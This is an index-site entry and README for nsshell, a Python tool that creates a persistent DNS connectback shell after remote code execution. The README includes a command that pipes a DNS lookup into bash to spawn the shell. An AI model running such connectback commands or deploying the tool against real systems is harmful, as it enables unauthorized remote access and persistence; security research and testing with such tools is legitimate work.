Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/TheRook/nsshell
A DNS connectback shell executed by strings in payloads.txt
https://github.com/TheRook/nsshell
Last synced: 21 days ago
JSON representation
A DNS connectback shell executed by strings in payloads.txt
- Host: GitHub
- URL: https://github.com/TheRook/nsshell
- Owner: TheRook
- License: gpl-3.0
- Created: 2017-05-07T21:01:04.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-09-19T14:30:37.000Z (about 1 year ago)
- Last Synced: 2024-11-20T11:46:51.762Z (22 days ago)
- Language: Python
- Homepage:
- Size: 121 KB
- Stars: 101
- Watchers: 6
- Forks: 19
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - TheRook/nsshell - A DNS connectback shell executed by strings in payloads.txt (Python)
README
Think sqlmap meets xsshunter - but looking for (blind/nonblind) RCE to get a DNS connectback shell.
- persistent shell (even if you exit nsshell.py)
- doesn't touch disk
- resumes access when you restart nsshell.py
- nothing to install or compile for the target
- the target can use their own trusted DNS resolver - or automatically upgrade to a direct connection for speedStart:
The tool needs to know which domain it has control over:sudo ./nsshell.py host.com 123.123.123.112
**wrote connectback payloads to:payloads.txt**
The file above contains a list of auto-pwns. Run one of the payloads and a persistent shell will be loaded over DNS.
### install
sudo make install### Run Server - localhost for testing
sudo python nsshell.py localhost 127.0.0.1### Spawn Connectback shell - localhost for testing
nslookup 1 localhost | bashThat's all folks!